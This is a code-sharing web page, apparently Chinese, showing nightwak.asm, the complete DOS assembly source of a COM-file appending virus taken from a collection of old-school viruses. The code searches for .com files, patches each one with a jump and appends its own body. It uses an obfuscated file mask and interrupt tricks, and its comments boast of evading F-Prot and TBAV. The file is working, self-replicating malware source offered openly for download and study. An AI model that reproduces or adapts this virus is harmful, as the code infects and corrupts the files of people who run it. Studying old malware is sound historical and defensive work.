nightwak.asm

来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 120 行

ASM
120
字号 
;
;               Simple com appender destined to be another SillyC
;               so im putting the file name in as the virus name .. nuff said
;
;               Unscannable by F-Prot & by TBAV with no flags
;               Uses a novel way of beating S flag
;
;               Scans as a VCL/IVP variant with AVP/DSAV
;
.model    tiny
.code
     org  100h
begin:
     db   0E9h
     dw   offset start-103h
start:
     call delta
delta:
     pop  bp
     sub  bp,offset delta
     and  word ptr [begin],0
     and  byte ptr [begin+2],0
     or   ah,[old_bytes+bp]
     or   al,[old_bytes+bp+1]
     or   bh,[old_bytes+bp+2]
     or   byte ptr [begin],ah
     or   byte ptr [begin+1],al
     or   byte ptr [begin+2],bh 
     and  byte ptr [f_string+bp],7Fh
     and  byte ptr [f_string+bp+1],7Fh
     and  byte ptr [f_string+bp+2],7Fh
     and  byte ptr [f_string+bp+3],7Fh
     and  byte ptr [f_string+bp+4],7Fh
     mov  dh,1ah
     lea  ax,[bp+offset dta]
     xchg ax,dx
     int  21h
     mov  dh,4eh
find_next:
     xor  cx,cx
     lea  ax,[bp+offset f_string]
     xchg ax,dx
     int  21h
     jc   done2
     mov  cl,[dta+1ah+bp]
     mov  ch,[dta+1bh+bp]
     sub  cx,3
     mov  [new_bytes+1+bp],cl
     mov  [new_bytes+2+bp],ch
     mov  dx,3D02h
     lea  ax,[bp+offset dta+1Eh]
     xchg ax,dx
     int  21h
     xchg ax,bx
     mov  dh,3fh
     mov  cx,3
     lea  ax,[bp+offset old_bytes]
     xchg ax,dx
     int  21h
     cmp  [bp+old_bytes],0E9h
     jne  okay
     mov  ah,3eh
     int  21h
     mov  dh,4fh
     jmp  find_next
done2:
     jmp  done
okay:
     mov  dx,4200h
     xor  cx,cx
     xor  ax,ax
     xchg ax,dx
     int  21h
     mov  dh,40h
     mov  cx,3
     lea  ax,[bp+offset new_bytes]
     xchg ax,dx
     and  byte ptr [n1+bp+1],7fh
n1:
     int  0A1h
     mov  byte ptr [n1+bp+1],0A1h
     mov  dx,4202h
     xor  cx,cx
     xor  ax,ax
     xchg ax,dx
     int  21h
     mov  dh,40h
     mov  cx, offset theend - offset start + 56
     or   byte ptr [f_string+bp],80h
     or   byte ptr [f_string+bp+1],80h
     or   byte ptr [f_string+bp+2],80h
     or   byte ptr [f_string+bp+3],80h
     or   byte ptr [f_string+bp+4],80h
     lea  ax,[bp+offset start]
     xchg ax,dx
     and  byte ptr [n2+bp+1],7fh
n2:
     int  0A1h
     mov  ah,3Eh
     int  21h
done:
     mov  ax,101h
     xor  bx,bx
     xchg ax,bx
     xor  cx,cx
     dec  bx
     xor  dx,dx
     push bx
     xor  bp,bp
     xor  bx,bx
     ret
;danke db 'Nightwak'
theend:
.data
old_bytes db   0c3h,90h,90h
new_bytes db   0E9h, 2 dup (0)
dta       db   42 dup(0)
f_string  db   '*'+80h,'.'+80h,'c'+80h,'o'+80h,'m'+80h,0,0
     end  begin

nightwak.asm - 源码说明

本页面展示了「More than 800 virus code (old school) just for fun and studying prehistoric viruses. WARNING: use」中的 nightwak.asm 源码文件,采用 汇编 编程语言编写,共 120 行代码。您可以在线阅读完整代码内容,也可以返回资源详情页下载完整源码包进行本地学习和开发。

虫虫下载站收录了大量与prehistoric相关的技术资源,包括源代码、技术文档、电路图等,是电子工程师和嵌入式开发者的专业学习平台。

⌨️ 快捷键说明

复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?